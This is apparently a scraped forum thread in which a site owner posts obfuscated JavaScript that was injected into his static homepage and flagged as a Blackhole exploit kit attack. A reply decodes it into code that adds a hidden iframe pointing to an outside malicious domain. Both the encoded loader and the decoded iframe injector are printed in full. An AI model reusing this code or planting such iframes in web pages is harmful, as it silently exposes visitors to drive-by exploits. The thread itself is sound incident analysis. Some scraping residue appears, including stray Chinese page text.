Strange Javascript appearing on static html web page
I have a static html web page for my website and recently was not able to load my website on my Windows XP machine. Norton Antivirus blocked the website reporting it as a "Web Attack: Blackhole Toolkit Website 7". I downloaded my index.htm page and found this code in the body which was not created by me when compared to my local copy of the same page:
<script>
el = document.createElement("div");
el.appendChild(document.createTextNode("ReferenceErr"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"), el.childNodes[1]);
try {
try {
throw 1
} catch (a) {
b[2] = 21
};
} catch (a) {
k = el.firstChild.nodeValue + a.toString().substr(0, 0);
};
ar = "\"aTBtc0.gyA:/[hi],b> vCldmwf)s{up1oE'=<r(n;N}ez";
ar2 = "R80c80c60c112c84c164c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c116c124c80c80c80c60c112c160c4c104c184c160c164c116c172c80c80c180c84c184c96c120c184c84c124c80c80c80c100c140c20c128c104c184c168c16c28c108c160c60c16c184c164c0c156c60c112c160c4c104c184c84c120c160c20c152c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c84c108c60c100c16c56c152c148c136c24c148c84c56c184c60c32c56c16c152c148c136c24c148c84c120c16c36c96c184c152c148c88c60c120c60c72c60c96c60c16c36c44c56c60c100c100c184c168c172c132c140c120c60c16c60c140c168c44c4c72c120c140c96c128c16c184c172c96c184c112c16c44c24c172c16c140c132c44c24c172c148c76c156c48c60c112c160c4c104c184c76c0c116c172c80c80c180c80c80c112c128c168c20c16c60c140c168c84c60c112c160c4c104c184c160c164c116c124c80c80c80c88c4c160c84c112c84c152c84c100c140c20c128c104c184c168c16c28c20c160c184c4c16c184c144c96c184c104c184c168c16c164c148c60c112c160c4c104c184c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c120c160c20c148c68c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c116c172c112c28c120c16c36c96c184c28c88c60c120c60c72c60c96c60c16c36c152c148c56c60c100c100c184c168c148c172c112c28c120c16c36c96c184c28c132c140c120c60c16c60c140c168c152c148c4c72c120c140c96c128c16c184c148c172c112c28c120c16c36c96c184c28c96c184c112c16c152c148c24c148c172c112c28c120c16c36c96c184c28c16c140c132c152c148c24c148c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c108c60c100c16c56c148c68c148c136c24c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c56c184c60c32c56c16c148c68c148c136c24c148c116c172c80c80c80c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c28c4c132c132c184c168c100c92c56c60c96c100c164c112c116c172c80c80c180";
pau = "urn eReferenceErr".replace(k, "va" + el.childNodes[1].nodeValue);
e = Function("ret" + pau)();
ar2 = ar2.split("c");
ar2[0] = "80";
s = "";
for (i = 0; i != ar2.length; i++) {
e('po'.concat('s=par', 'seInt(开发者_C百科k', '.rep', 'lace("R', 'eferen', '","0a', 'sd"))+', 'ar2[', 'i]/', '4'));
e('s+=ar.substr(pos,1)');
}
e(s);
</script>
Anybody have any idea how this might have appeared and how my index.htm page could have been modified?
Thanks, Steve
Below is the end result of the script. Ran it on a VM to test it out, got a malicious site warning via google as well. All of that to write this..
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://toolbarqueries-google.com/in.cgi?default');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
Someone hacked your site - there are many ways to do this , and there are many things to improve in security
加载中,请稍侯......
精彩评论